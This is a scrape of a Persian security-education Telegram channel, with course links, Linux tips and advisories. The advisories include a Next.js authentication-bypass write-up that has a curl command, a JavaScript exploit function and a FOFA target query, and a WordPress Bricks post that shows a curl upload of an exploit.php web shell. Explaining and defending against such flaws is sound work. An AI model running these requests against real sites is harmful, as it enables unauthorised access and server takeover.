This media is not supported in your browser
VIEW IN TELEGRAM
حضور پر شور مردم در لحظه تحویل سال ۱۴۰۴ در شهرستان پاسارگاد, آرامگاه کورش بزرگ
❤27👎8❤🔥1
بحث خارج از امنیت ممنوع
گپ پرسش و پاسخ
https://news.1rj.ru/str/+XPV3S0tygl1lZGE0
کانال ها :
@TryHackBoxStory
@TryHackBoxOfficial
گپ پرسش و پاسخ
https://news.1rj.ru/str/+XPV3S0tygl1lZGE0
کانال ها :
@TryHackBoxStory
@TryHackBoxOfficial
Telegram
TryHackBoxGp
بحث خارج از امنیت ممنوع
گپ پرسش و پاسخ
کانال ها :
@TryHackBox
@TryHackBoxOfficial
گپ پرسش و پاسخ
کانال ها :
@TryHackBox
@TryHackBoxOfficial
اطلاعات مربوط به نام میزبان.pdf
820.7 KB
این پست به بررسی اطلاعات نام میزبان ها (Hostnames) و نقش کلیدی آنها در حملات سایبری و تست نفوذ میپردازد.
📌 آنچه در این پست یاد میگیرید:
🔹 شناسایی اهداف حیاتی شبکه با تحلیل نام میزبانها (مثل VPN، Citrix، Exchange، SSO).
🔹 تکنیکهای نفوذ :
حمله Password Spraying به سرویسهای بدون MFA (مثال: VPN، Citrix).
🔹 استفاده از Log Stealer برای استخراج اعتبارنامه ها و Lateral Movement.
🔹 ابزارهای کلیدی: Nmap, Hydra, Metasploit, OpenVPN.
🔹 مثالهای عملی با دستورات فنی (اسکن پورتها، تست Breakout در Citrix، سرقت لاگها).
🔹 دفاع مؤثر: محدودسازی دسترسی، رمزنگاری لاگها، نظارت بر فعالیت ها.
#Recon
@TryHackBox
📌 آنچه در این پست یاد میگیرید:
🔹 شناسایی اهداف حیاتی شبکه با تحلیل نام میزبانها (مثل VPN، Citrix، Exchange، SSO).
🔹 تکنیکهای نفوذ :
حمله Password Spraying به سرویسهای بدون MFA (مثال: VPN، Citrix).
🔹 استفاده از Log Stealer برای استخراج اعتبارنامه ها و Lateral Movement.
🔹 ابزارهای کلیدی: Nmap, Hydra, Metasploit, OpenVPN.
🔹 مثالهای عملی با دستورات فنی (اسکن پورتها، تست Breakout در Citrix، سرقت لاگها).
🔹 دفاع مؤثر: محدودسازی دسترسی، رمزنگاری لاگها، نظارت بر فعالیت ها.
#Recon
@TryHackBox
👍4❤2🙏1
Try Hack Box
#جلسه_چهارم دوره #رایگان سکوریتی پلاس | Security + بخش : رمزنگاری دوره Security+ یک دوره معتبر و پایهای در زمینه امنیت سایبری است که توسط CompTIA ارائه میشود. این دوره به شما مهارتهای لازم برای شناسایی و مدیریت تهدیدات امنیتی و مقابله با حملات، پیادهسازی…
#جلسه_پنجم دوره #رایگان سکوریتی پلاس | Security +
بخش : ادامه رمزنگاری
دوره Security+ یک دوره معتبر و پایهای در زمینه امنیت سایبری است که توسط CompTIA ارائه میشود. این دوره به شما مهارتهای لازم برای شناسایی و مدیریت تهدیدات امنیتی و مقابله با حملات، پیادهسازی راهکارهای امنیتی،اصول رمزنگاری و درک اصول امنیت شبکه را آموزش میدهد.
قسمت اول :
https://youtu.be/Hn5qheOVz6Q
قسمت دوم :
https://youtu.be/R8Qzq0qQm3Q
قسمت سوم :
https://youtu.be/bE1KSm7U8uE
قسمت چهارم :
https://youtu.be/wOFhAGvFCSA
قسمت پنجم :
https://youtu.be/7xhLSLB79EI
----------
🆔 @TryHackBox
----------
بخش : ادامه رمزنگاری
دوره Security+ یک دوره معتبر و پایهای در زمینه امنیت سایبری است که توسط CompTIA ارائه میشود. این دوره به شما مهارتهای لازم برای شناسایی و مدیریت تهدیدات امنیتی و مقابله با حملات، پیادهسازی راهکارهای امنیتی،اصول رمزنگاری و درک اصول امنیت شبکه را آموزش میدهد.
قسمت اول :
https://youtu.be/Hn5qheOVz6Q
قسمت دوم :
https://youtu.be/R8Qzq0qQm3Q
قسمت سوم :
https://youtu.be/bE1KSm7U8uE
قسمت چهارم :
https://youtu.be/wOFhAGvFCSA
قسمت پنجم :
https://youtu.be/7xhLSLB79EI
انتقادی داشتید حتما اطلاع بدید، تا بتونیم آموزش با کیفیتتری ارائه بدیم،امیدواریم از آموزش لذت ببرید.
----------
🆔 @TryHackBox
----------
👍8🙏2
Try Hack Box
#جلسه_پنجم دوره #رایگان سکوریتی پلاس | Security + بخش : ادامه رمزنگاری دوره Security+ یک دوره معتبر و پایهای در زمینه امنیت سایبری است که توسط CompTIA ارائه میشود. این دوره به شما مهارتهای لازم برای شناسایی و مدیریت تهدیدات امنیتی و مقابله با حملات،…
دوستانی که دوره سکوریتی پلاس مارو میگذرونند ، ما یک گروه ایجاد کردیم که فایل تمرینی یا اگر سوالی یا مشکلی داشتید بپرسید و فایل ها رو در اختیارتون قرار بدیم اگر مایل بودید به گروه بپیوندید به ما پیام دهید لینک گروه رو ارسال کنیم برای شما :
@Unique_exploitbot
@Unique_exploitbot
دوستان از این بعد لوگوی ما این خواهد بود و در مقالات و کتابها از این لوگو استفاده خواهیم کرد
🔥10👍1🌚1
#CVE-2025-29927
در فریمورک Next.js React یک آسیبپذیری امنیتی بحرانی شناسایی شده است که تحت شرایط خاص میتواند برای دور زدن بررسیهای احراز هویت مورد سوءاستفاده قرار گیرد.
این آسیبپذیری با شناسه CVE-2025-29927 ردیابی شده و امتیاز ۹.۱ از ۱۰ در مقیاس CVSS دارد.
Next.js از هدر داخلی
برای جلوگیری از ایجاد حلقههای بینهایت در درخواستهای بازگشتی استفاده میکند.
با این حال، رد شدن اجرای Middleware باعث میشود درخواستها بتوانند بررسیهای حیاتی، از جمله اعتبارسنجی کوکیهای احراز هویت، قبل از رسیدن به مسیرهای موردنظر را دور بزنند.
این مشکل در نسخههای ۱۲.۳.۵، ۱۳.۵.۹، ۱۴.۲.۲۵ و ۱۵.۲.۳ برطرف شده است. به عنوان راهکار موقت، توصیه میشود از پردازش درخواستهای کاربران خارجی که حاوی هدر
راشد علام (با نامهای مستعار zhero و cold-try )، محققی که این آسیبپذیری را کشف و گزارش کرد، جزئیات فنی بیشتری را افشا کرده است. بنابراین، توصیه میشود هرچه سریعتر پچ های امنیتی اعمال شوند.
به گفته JFrog، این باگ به مهاجمان اجازه میدهد به راحتی بررسیهای احراز هویت در Middleware ی Next.js را دور بزنند که ممکن است منجر به دسترسی به صفحات حساس وبسایت (مخصوص مدیران یا کاربران با دسترسی بالا) شود.
همچنین هشدار داده شده که هر وبسایتی که از Middleware برای کنترل دسترسی کاربران بدون بررسیهای اضافی استفاده میکند، در معرض این آسیبپذیری (CVE-2025-29927) قرار دارد و مهاجمان میتوانند به منابع غیرمجاز دسترسی پیدا کنند.
@TryHackBox
در فریمورک Next.js React یک آسیبپذیری امنیتی بحرانی شناسایی شده است که تحت شرایط خاص میتواند برای دور زدن بررسیهای احراز هویت مورد سوءاستفاده قرار گیرد.
این آسیبپذیری با شناسه CVE-2025-29927 ردیابی شده و امتیاز ۹.۱ از ۱۰ در مقیاس CVSS دارد.
Next.js از هدر داخلی
x-middleware-subrequestبرای جلوگیری از ایجاد حلقههای بینهایت در درخواستهای بازگشتی استفاده میکند.
با این حال، رد شدن اجرای Middleware باعث میشود درخواستها بتوانند بررسیهای حیاتی، از جمله اعتبارسنجی کوکیهای احراز هویت، قبل از رسیدن به مسیرهای موردنظر را دور بزنند.
این مشکل در نسخههای ۱۲.۳.۵، ۱۳.۵.۹، ۱۴.۲.۲۵ و ۱۵.۲.۳ برطرف شده است. به عنوان راهکار موقت، توصیه میشود از پردازش درخواستهای کاربران خارجی که حاوی هدر
x-middleware-subrequest هستند، جلوگیری شود. راشد علام (با نامهای مستعار zhero و cold-try )، محققی که این آسیبپذیری را کشف و گزارش کرد، جزئیات فنی بیشتری را افشا کرده است. بنابراین، توصیه میشود هرچه سریعتر پچ های امنیتی اعمال شوند.
به گفته JFrog، این باگ به مهاجمان اجازه میدهد به راحتی بررسیهای احراز هویت در Middleware ی Next.js را دور بزنند که ممکن است منجر به دسترسی به صفحات حساس وبسایت (مخصوص مدیران یا کاربران با دسترسی بالا) شود.
همچنین هشدار داده شده که هر وبسایتی که از Middleware برای کنترل دسترسی کاربران بدون بررسیهای اضافی استفاده میکند، در معرض این آسیبپذیری (CVE-2025-29927) قرار دارد و مهاجمان میتوانند به منابع غیرمجاز دسترسی پیدا کنند.
@TryHackBox
👍1
Try Hack Box
#CVE-2025-29927 در فریمورک Next.js React یک آسیبپذیری امنیتی بحرانی شناسایی شده است که تحت شرایط خاص میتواند برای دور زدن بررسیهای احراز هویت مورد سوءاستفاده قرار گیرد. این آسیبپذیری با شناسه CVE-2025-29927 ردیابی شده و امتیاز ۹.۱ از ۱۰ در مقیاس CVSS…
مکانیزم آسیبپذیری
این آسیبپذیری مربوط به رفتار نادرست سیستم Middleware در Next.js هنگام پردازش هدر x-middleware-subrequest است. این هدر به صورت داخلی توسط Next.js برای جلوگیری از حلقههای بازگشتی (recursive loops) در درخواستهای Middleware استفاده میشود.
کد آسیبپذیر (شبیهسازی):
نحوه سوءاستفاده
مهاجم میتواند با اضافه کردن هدر جعلی به درخواستهای خود، Middleware را دور بزند:
@TryHackBox
این آسیبپذیری مربوط به رفتار نادرست سیستم Middleware در Next.js هنگام پردازش هدر x-middleware-subrequest است. این هدر به صورت داخلی توسط Next.js برای جلوگیری از حلقههای بازگشتی (recursive loops) در درخواستهای Middleware استفاده میشود.
کد آسیبپذیر (شبیهسازی):
// middleware.js (نسخههای آسیبپذیر)
export function middleware(request) {
const isSubRequest = request.headers.get('x-middleware-subrequest');
if (isSubRequest) {
return NextResponse.next();
}
// بررسیهای احراز هویت
if (!isAuthenticated(request)) {
return new Response('Unauthorized', { status: 401 });
}
return NextResponse.next();
}
نحوه سوءاستفاده
مهاجم میتواند با اضافه کردن هدر جعلی به درخواستهای خود، Middleware را دور بزند:
curl -H "x-middleware-subrequest: 1" https://victim.com/admin
@TryHackBox
👏3❤1
Try Hack Box
مکانیزم آسیبپذیری این آسیبپذیری مربوط به رفتار نادرست سیستم Middleware در Next.js هنگام پردازش هدر x-middleware-subrequest است. این هدر به صورت داخلی توسط Next.js برای جلوگیری از حلقههای بازگشتی (recursive loops) در درخواستهای Middleware استفاده میشود.…
نمونه کد اکسپلویت
راهکارهای اصلاح
ارتقاء نسخه: استفاده از نسخههای اصلاح شده Next.js
میانافزار اصلاح شده:
راهکارهای دفاعی:
پیادهسازی بررسیهای احراز هویت در سطح صفحه
استفاده از کوکیهای امنیتی با HttpOnly و SameSite Strict
لاگگیری از درخواستهای حاوی هدر مشکوک
این آسیبپذیری نمونهای از مشکل اعتماد نابجا (Overreliance on Client-Supplied Headers) است. سیستم Middleware Next.js به صورت پیشفرض به هدرهای ارسالی توسط کلاینت اعتماد کرده بود، بدون آنکه مکانیسمی برای تأیید صحت آنها وجود داشته باشد.
این مشکل در معماری سیستمهای مبتنی بر Middleware رایج است، چرا که توسعهدهندگان اغلب فرض میکنند که برخی هدرها فقط توسط سیستم داخلی قابل استفاده هستند
@TryHackBox
async function exploit(targetUrl, protectedRoute) {
const headers = new Headers();
headers.append('x-middleware-subrequest', '1');
const response = await fetch(`${targetUrl}${protectedRoute}`, {
headers: headers
});
return response.status === 200;
}راهکارهای اصلاح
ارتقاء نسخه: استفاده از نسخههای اصلاح شده Next.js
میانافزار اصلاح شده:
export function middleware(request) {
// بررسی منشأ درخواست
const isInternalRequest = request.headers.get('x-verified-internal') === 'true';
// فقط برای درخواستهای داخلی اجازه رد شدن بدهد
if (request.headers.get('x-middleware-subrequest') && !isInternalRequest) {
return new Response('Invalid request', { status: 400 });
}
// ادامه منطق احراز هویت
}راهکارهای دفاعی:
پیادهسازی بررسیهای احراز هویت در سطح صفحه
استفاده از کوکیهای امنیتی با HttpOnly و SameSite Strict
لاگگیری از درخواستهای حاوی هدر مشکوک
این آسیبپذیری نمونهای از مشکل اعتماد نابجا (Overreliance on Client-Supplied Headers) است. سیستم Middleware Next.js به صورت پیشفرض به هدرهای ارسالی توسط کلاینت اعتماد کرده بود، بدون آنکه مکانیسمی برای تأیید صحت آنها وجود داشته باشد.
این مشکل در معماری سیستمهای مبتنی بر Middleware رایج است، چرا که توسعهدهندگان اغلب فرض میکنند که برخی هدرها فقط توسط سیستم داخلی قابل استفاده هستند
@TryHackBox
👏5❤1👍1🔥1
Try Hack Box
نمونه کد اکسپلویت async function exploit(targetUrl, protectedRoute) { const headers = new Headers(); headers.append('x-middleware-subrequest', '1'); const response = await fetch(`${targetUrl}${protectedRoute}`, { headers: headers }); return…
دورک :
https://en.fofa.info/result?qbase64=YXBwPSJORVhULkpTIg%3D%3D
FOFA Query:app="NEXT.JS"
@TryHackBox
https://en.fofa.info/result?qbase64=YXBwPSJORVhULkpTIg%3D%3D
FOFA Query:app="NEXT.JS"
@TryHackBox
FOFA
FOFA Search Engine
FOFA is a Cyberspace search engine. By conducting Cyberspace mapping, it can help researchers or enterprises quickly match network assets, such as vulnerability impact range analysis, application distribution statistics, and application popularity ranking…
تحلیل Limitless OSINT Challenges - تمرینهای پیشرفته جمعآوری اطلاعات آزاد
معرفی Limitless OSINT Challenges
یک مجموعه تمرین عملی برای متخصصان و علاقهمندان به جمعآوری اطلاعات از منابع آزاد (OSINT) است که در وبسایت http://limitless-osint.com/challenges ارائه شده است.
#Osint
@TryHackBox
معرفی Limitless OSINT Challenges
یک مجموعه تمرین عملی برای متخصصان و علاقهمندان به جمعآوری اطلاعات از منابع آزاد (OSINT) است که در وبسایت http://limitless-osint.com/challenges ارائه شده است.
#Osint
@TryHackBox
🔥3👍2
🧩 کانال های دیگر ما :
🔆 در اینجا رودمپ های مختلف میزاریم و یکسری منابع :
➖➖➖➖➖➖➖➖➖➖
🆔 @TryHackBoxOfficial
➖➖➖➖➖➖➖➖➖➖
🔆 در اینجا هم داستان مربوط هک و مهندسی اجتماعی و اوسینت میزاریم :
➖➖➖➖➖➖➖➖➖➖
🆔 @TryHackBoxStory
➖➖➖➖➖➖➖➖➖➖
🔆 در اینجا رودمپ های مختلف میزاریم و یکسری منابع :
➖➖➖➖➖➖➖➖➖➖
🆔 @TryHackBoxOfficial
➖➖➖➖➖➖➖➖➖➖
🔆 در اینجا هم داستان مربوط هک و مهندسی اجتماعی و اوسینت میزاریم :
➖➖➖➖➖➖➖➖➖➖
🆔 @TryHackBoxStory
➖➖➖➖➖➖➖➖➖➖
👍2
دوستان ما بخشی رو راه اندازی کردیم به اسم رادیو زیرو پاد که در اینجا فعلا داستان هایی که قرار میدیم رو برای شما به صورت پادکست در اوردیم و اگر استقبال خوبی بشه بقیه موارد هم به پادکست اضافه می شود .
درحال حاضر میتوانید داستان هایی که قرار دادیم را به طور پادکست پلی کنید و لذت ببرید .
@RadioZeroPod
درحال حاضر میتوانید داستان هایی که قرار دادیم را به طور پادکست پلی کنید و لذت ببرید .
@RadioZeroPod
❤🔥8👍4
دوستان درحال راه اندازی لابراتور برای شما هستم
و درگیر ترجمه یک کتاب که به زودی قرار میگیره
برای همین ممکنه فعلا پست آموزشی نباشه
با تشکر از صبر شما .
و درگیر ترجمه یک کتاب که به زودی قرار میگیره
برای همین ممکنه فعلا پست آموزشی نباشه
با تشکر از صبر شما .
🤩21❤3🔥1
درود دوستان عزیز
اگر از آموزشهای ما استفاده میکنید و دوست دارید از تلاش ما حمایت کنید، میتوانید از طریق لینک زیر کمک کوچکی به ما داشته باشید ❤:
https://daramet.com/TryHackBox
راستش را بخواهید، من همیشه از درخواست دونیت راحت نبودم، اما شرایطی پیش آمده که مجبورم این را امتحان کنم. امیدوارم شما دوستان درک کنید.
ممنون که همراه ما هستید.
اگر از آموزشهای ما استفاده میکنید و دوست دارید از تلاش ما حمایت کنید، میتوانید از طریق لینک زیر کمک کوچکی به ما داشته باشید ❤:
https://daramet.com/TryHackBox
راستش را بخواهید، من همیشه از درخواست دونیت راحت نبودم، اما شرایطی پیش آمده که مجبورم این را امتحان کنم. امیدوارم شما دوستان درک کنید.
ممنون که همراه ما هستید.
❤10👍1👏1
هکرها از یک قابلیت کمتر شناخته شده در وردپرس به نام Must Use Plugins (پلاگینهای ضروری) سوءاستفاده میکنند تا بدافزارها را نصب و از دید مدیران سایت پنهان کنند، در حالی که دسترسی دائمی از راه دور را حفظ میکنند.
قابلیت Must Use Plugins (mu-plugins) چیست؟
این ویژگی که با نام mu-plugins نیز شناخته میشود، در سال ۲۰۲۲ به سیستم مدیریت محتوای وردپرس اضافه شد. پلاگینهایی که در پوشه خاصی به نام /mu-plugins قرار میگیرند، بهصورت خودکار توسط وردپرس اجرا میشوند و نیازی به فعالسازی یا تأیید از طریق پیشخوان مدیریت ندارند.
این پلاگینها در بخش معمولی «پلاگینها» نمایش داده نمیشوند، بنابراین کاربران نمیتوانند بهصورت تصادفی آنها را غیرفعال یا حذف کنند. همین موضوع، این پوشه را به مکانی ایدهآل برای پنهانکردن بدافزارها تبدیل کرده است.
افزایش سوءاستفاده هکرها از mu-plugins
بر اساس گزارش گوَدَدی سیکوری (GoDaddy Sucuri)، هکرها حداقل از فوریه امسال از این قابلیت سوءاستفاده کردهاند و اکنون این فعالیت بهطور قابل توجهی افزایش یافته است.
هکرها با نفوذ به سایتهای وردپرس، بدافزارها را در پوشه mu-plugins قرار میدهند، چون میدانند که این کدها بهصورت خودکار اجرا شده و در پیشخوان سایت نمایش داده نمیشوند. علاوه بر این، از آنجا که این قابلیت نسبتاً ناشناخته است، بسیاری از ابزارهای امنیتی وردپرس حتی این پوشه را برای تهدیدات احتمالی اسکن نمیکنند.
نمونههایی از بدافزارهای کشفشده در mu-plugins
سیکوری متوجه شده است که هکرها از mu-plugins برای موارد زیر استفاده میکنند:
- نصب بکدورها و وبشلها
- قراردادن اسپم سئو در سایتهای هکشده
- تغییر مسیر ترافیک به سایتهای مخرب
برخی از فایلهای مخرب شناساییشده:
-
-
-
در این میان، فایل redirect.php خود را بهعنوان «بهروزرسانی مرورگر» جا میزند تا کاربران را فریب دهد و آنها را مجبور به نصب بدافزاری کند که میتواند دادهها را سرقت کند یا payloadهای اضافی را دانلود کند.
💢 هشدار به مالکان سایتهای وردپرس
این طیف گسترده از سوءاستفادهها نشان میدهد که این روش در حال محبوبشدن در بین گروههای هکری است که از این پوشه بهعنوان پایگاهی پایدار برای فعالیتهای مخرب استفاده میکنند.
توصیههای امنیتی:
✅ محتوای پوشه mu-plugins را بررسی کنید.
✅ اگر از پلاگینهای Must Use استفاده نمیکنید، آنها را حذف کنید.
✅ مطمئن شوید که حذف بهصورت دائمی انجام شده است.
با این اقدامات، میتوانید از سایت خود در برابر این تهدید پنهان محافظت کنید.
@TryHackBox
قابلیت Must Use Plugins (mu-plugins) چیست؟
این ویژگی که با نام mu-plugins نیز شناخته میشود، در سال ۲۰۲۲ به سیستم مدیریت محتوای وردپرس اضافه شد. پلاگینهایی که در پوشه خاصی به نام /mu-plugins قرار میگیرند، بهصورت خودکار توسط وردپرس اجرا میشوند و نیازی به فعالسازی یا تأیید از طریق پیشخوان مدیریت ندارند.
این پلاگینها در بخش معمولی «پلاگینها» نمایش داده نمیشوند، بنابراین کاربران نمیتوانند بهصورت تصادفی آنها را غیرفعال یا حذف کنند. همین موضوع، این پوشه را به مکانی ایدهآل برای پنهانکردن بدافزارها تبدیل کرده است.
افزایش سوءاستفاده هکرها از mu-plugins
بر اساس گزارش گوَدَدی سیکوری (GoDaddy Sucuri)، هکرها حداقل از فوریه امسال از این قابلیت سوءاستفاده کردهاند و اکنون این فعالیت بهطور قابل توجهی افزایش یافته است.
هکرها با نفوذ به سایتهای وردپرس، بدافزارها را در پوشه mu-plugins قرار میدهند، چون میدانند که این کدها بهصورت خودکار اجرا شده و در پیشخوان سایت نمایش داده نمیشوند. علاوه بر این، از آنجا که این قابلیت نسبتاً ناشناخته است، بسیاری از ابزارهای امنیتی وردپرس حتی این پوشه را برای تهدیدات احتمالی اسکن نمیکنند.
نمونههایی از بدافزارهای کشفشده در mu-plugins
سیکوری متوجه شده است که هکرها از mu-plugins برای موارد زیر استفاده میکنند:
- نصب بکدورها و وبشلها
- قراردادن اسپم سئو در سایتهای هکشده
- تغییر مسیر ترافیک به سایتهای مخرب
برخی از فایلهای مخرب شناساییشده:
-
wp-content/mu-plugins/redirect.php -
wp-content/mu-plugins/index.php -
wp-content/mu-plugins/custom-js-loader.php در این میان، فایل redirect.php خود را بهعنوان «بهروزرسانی مرورگر» جا میزند تا کاربران را فریب دهد و آنها را مجبور به نصب بدافزاری کند که میتواند دادهها را سرقت کند یا payloadهای اضافی را دانلود کند.
💢 هشدار به مالکان سایتهای وردپرس
این طیف گسترده از سوءاستفادهها نشان میدهد که این روش در حال محبوبشدن در بین گروههای هکری است که از این پوشه بهعنوان پایگاهی پایدار برای فعالیتهای مخرب استفاده میکنند.
توصیههای امنیتی:
✅ محتوای پوشه mu-plugins را بررسی کنید.
✅ اگر از پلاگینهای Must Use استفاده نمیکنید، آنها را حذف کنید.
✅ مطمئن شوید که حذف بهصورت دائمی انجام شده است.
با این اقدامات، میتوانید از سایت خود در برابر این تهدید پنهان محافظت کنید.
@TryHackBox
Sucuri Blog
Hidden Malware Strikes Again: Mu-Plugins Under Attack
Hidden malware strikes WordPress mu-plugins. Our latest findings reveal how to safeguard your site against these threats.
👍7
آسیبپذیری CVE-2024-25600 در پلاگین Bricks وردپرس
معرفی آسیبپذیری:
این یک آسیبپذیری اجرای کد از راه دور (RCE) بدون نیاز به احراز هویت در پلاگین Bricks Builder وردپرس (نسخههای 1.9.6 و قبلتر) است.
جزئیات فنی:
- مکانیسم حمله:
- از طریق یک درخواست AJAX کنترلنشده در
- امکان آپلود فایلهای PHP مخرب
- دسترسی کامل به سرور (web shell)
- کد آسیبپذیر:
نمونه اکسپلویت:
تأثیرات:
- نصب وبشل روی سرور
- دسترسی به پایگاه داده وردپرس
- امکان گسترش حمله به سایر سیستمها
راهکارهای مقابله:
1. فوری:
- ارتقاء به نسخه 1.9.7+
- غیرفعال کردن پلاگین تا زمان بهروزرسانی
2. پیشگیرانه:
- محدود کردن دسترسی به
- پیادهسازی WAF با قوانین مخصوص
تشخیص سوءاستفاده:
- بررسی لاگها برای درخواستهای غیرعادی به
- جستجوی فایلهای PHP جدید در دایرکتوری uploads
نکته اخلاقی:
این اطلاعات فقط برای اهداف آموزشی هست .
https://github.com/Chocapikk/CVE-2024-25600
#Cve
@TryHackBox
معرفی آسیبپذیری:
این یک آسیبپذیری اجرای کد از راه دور (RCE) بدون نیاز به احراز هویت در پلاگین Bricks Builder وردپرس (نسخههای 1.9.6 و قبلتر) است.
جزئیات فنی:
- مکانیسم حمله:
- از طریق یک درخواست AJAX کنترلنشده در
admin-ajax.php- امکان آپلود فایلهای PHP مخرب
- دسترسی کامل به سرور (web shell)
- کد آسیبپذیر:
// در فایل اصلی پلاگین
add_action('wp_ajax_bricks_upload', 'handle_file_upload');
// عدم وجود بررسیهای امنیتی کافی
نمونه اکسپلویت:
curl -X POST "http://target.com/wp-admin/admin-ajax.php" \
-F "action=bricks_upload" \
-F "file=@exploit.php"
تأثیرات:
- نصب وبشل روی سرور
- دسترسی به پایگاه داده وردپرس
- امکان گسترش حمله به سایر سیستمها
راهکارهای مقابله:
1. فوری:
- ارتقاء به نسخه 1.9.7+
- غیرفعال کردن پلاگین تا زمان بهروزرسانی
2. پیشگیرانه:
- محدود کردن دسترسی به
admin-ajax.php- پیادهسازی WAF با قوانین مخصوص
تشخیص سوءاستفاده:
- بررسی لاگها برای درخواستهای غیرعادی به
admin-ajax.php- جستجوی فایلهای PHP جدید در دایرکتوری uploads
نکته اخلاقی:
این اطلاعات فقط برای اهداف آموزشی هست .
https://github.com/Chocapikk/CVE-2024-25600
#Cve
@TryHackBox
GitHub
GitHub - Chocapikk/CVE-2024-25600: Unauthenticated Remote Code Execution – Bricks <= 1.9.6
Unauthenticated Remote Code Execution – Bricks <= 1.9.6 - Chocapikk/CVE-2024-25600
👍1
این دستور را در ترمینال خود وارد کنید:
⭕ توضیح :
این دستور اطلاعات دمایی قطعات سختافزاری سیستم شما را به صورت زنده (هر 1 ثانیه) نمایش میدهد، شامل:
- دمای پردازنده (CPU)
- دمای کارت گرافیک (GPU)
- دمای مودم وایفای (Wi-Fi)
- دمای حافظههای NVMe SSD
- دمای هارددیسکهای (HDD)
#### ویژگیهای دستور:
-
تغییرات را هایلایت میکند
-
بروزرسانی هر 1 ثانیه
-
ابزار اصلی خواندن سنسورهای سختافزاری
نکات فنی:
1. نیاز به نصب بسته
2. قبل از استفاده باید سنسورها را پیکربندی کنید:
3. برای سیستمهای مختلف ممکن است خروجی متفاوت باشد
#linux
@TryHackBox
watch -d -n 1 sensors
⭕ توضیح :
این دستور اطلاعات دمایی قطعات سختافزاری سیستم شما را به صورت زنده (هر 1 ثانیه) نمایش میدهد، شامل:
- دمای پردازنده (CPU)
- دمای کارت گرافیک (GPU)
- دمای مودم وایفای (Wi-Fi)
- دمای حافظههای NVMe SSD
- دمای هارددیسکهای (HDD)
#### ویژگیهای دستور:
-
-d:تغییرات را هایلایت میکند
-
-n 1: بروزرسانی هر 1 ثانیه
-
sensors: ابزار اصلی خواندن سنسورهای سختافزاری
نکات فنی:
1. نیاز به نصب بسته
lm-sensors دارد (در اوبونتو: sudo apt install lm-sensors)2. قبل از استفاده باید سنسورها را پیکربندی کنید:
sudo sensors-detect3. برای سیستمهای مختلف ممکن است خروجی متفاوت باشد
#linux
@TryHackBox
❤4
نکته سریع لینوکس: حذف پوشههای خالی
اگر میخواهید پوشههای خالی را حذف کنید، میتوانید از دستور
#### توضیح گزینهها:
-
فقط پوشهها (دایرکتوریها) را جستجو میکند
-
فقط پوشههای خالی را انتخاب میکند
-
دستور
روش جایگزین:
نکات مهم:
1.
فقط پوشههای کاملاً خالی را حذف میکند (حاوی هیچ فایل یا پوشه دیگری نباشند)
2. گزینه
3. نقطه (
مثال کاربردی:
اگر بخواهید پوشههای خالی را در مسیر
این دستورات برای تمیزکاری خودکار پوشهها و مدیریت فضای ذخیرهسازی بسیار مفید هستند.
#Linux #لینوکس
@TryHackBox
اگر میخواهید پوشههای خالی را حذف کنید، میتوانید از دستور
find استفاده کنید:find . -type d -empty -exec rmdir -v {} +#### توضیح گزینهها:
-
-type d: فقط پوشهها (دایرکتوریها) را جستجو میکند
-
-empty: فقط پوشههای خالی را انتخاب میکند
-
-exec rmdir -v {} +: دستور
rmdir را برای حذف پوشهها اجرا میکند و عملیات را نمایش میدهد (-v)روش جایگزین:
find . -type d -empty -delete
نکات مهم:
1.
rmdirفقط پوشههای کاملاً خالی را حذف میکند (حاوی هیچ فایل یا پوشه دیگری نباشند)
2. گزینه
-delete در روش دوم مستقیم پوشهها را حذف میکند3. نقطه (
.) در ابتدای دستور به معنای جستجو از پوشه جاری استمثال کاربردی:
اگر بخواهید پوشههای خالی را در مسیر
/home/user/docs حذف کنید:find /home/user/docs -type d -empty -delete
این دستورات برای تمیزکاری خودکار پوشهها و مدیریت فضای ذخیرهسازی بسیار مفید هستند.
#Linux #لینوکس
@TryHackBox
❤6👍2
در دستور find گزینه -exec وجود دارد که میتوان از آن برای فراخوانی یک ابزار خارجی و انجام عملیات خاص روی فایلهای منطبق با معیارهای جستجو استفاده کرد.
مثال:
این دستور برای انجام یک عمل یکسان روی چندین فایل در مکانهای مختلف مفید است.
در این مثال، دستور ls -lah برای نمایش اطلاعاتی مانند مجوزها و سایر متادادههای هر فایل یافتشده اجرا میشود.
- علامت {} بهعنوان جاینگهدار نام فایل عمل میکند و باید آخرین عنصر در لیست پارامترها باشد.
- علامت ; نشاندهنده پایان لیست پارامترهاست و باید با بکاسلش (\) محافظت شود، در غیر این صورت شل آن را تفسیر میکند.
همچنین میتوانید بهجای ; از + استفاده کنید تا پایان لیست پارامترها مشخص شود. بین + و {} باید فاصله وجود داشته باشد.
مثال با +:
همچنین میتوانید چندین دستور را با -exec در find اجرا کنید، مثلاً:
#نکته #لینوکس
@TryHackBox
مثال:
find ~/ -type f -exec ls -lah {} \;
این دستور برای انجام یک عمل یکسان روی چندین فایل در مکانهای مختلف مفید است.
در این مثال، دستور ls -lah برای نمایش اطلاعاتی مانند مجوزها و سایر متادادههای هر فایل یافتشده اجرا میشود.
- علامت {} بهعنوان جاینگهدار نام فایل عمل میکند و باید آخرین عنصر در لیست پارامترها باشد.
- علامت ; نشاندهنده پایان لیست پارامترهاست و باید با بکاسلش (\) محافظت شود، در غیر این صورت شل آن را تفسیر میکند.
همچنین میتوانید بهجای ; از + استفاده کنید تا پایان لیست پارامترها مشخص شود. بین + و {} باید فاصله وجود داشته باشد.
مثال با +:
find ~/ -type f -exec ls -lah {} +
همچنین میتوانید چندین دستور را با -exec در find اجرا کنید، مثلاً:
find . -name "*.txt" -exec wc {} \; -exec du -sh {} \;
#نکته #لینوکس
@TryHackBox
👍3❤1🔥1
🔎 یک دورک گوگل که همیشه و همهجا جواب میدهد
در عملیات شناسایی (Recon)، میتوانید از چیزی شبیه به این استفاده کنید:
© [COMPANY]. All rights reserved.
برای پیدا کردن تمام دامنههای اصلی مرتبط با یک شرکت در صورت نیاز، میتوانید نتایج نامرتبط را از خروجی جستجو حذف کنید.
توضیح:
- این روش از Google Dorking برای پیدا کردن صفحاتی استفاده میکند که شامل عبارت کپیرایت استاندارد شرکتها هستند.
- جایگزین کردن [COMPANY] با نام شرکت موردنظر (مثلاً © Google. All rights reserved.) میتواند دامنههای اصلی و ساب دامنههای آن را فاش کند.
- این تکنیک در جستجوی پیشرفته گوگل (Google Hacking) و مرحله شناسایی (Recon) برنامههای باگ بانتی مفید است.
#bugbounty #tips #recon
@TryHackBoc
در عملیات شناسایی (Recon)، میتوانید از چیزی شبیه به این استفاده کنید:
© [COMPANY]. All rights reserved.
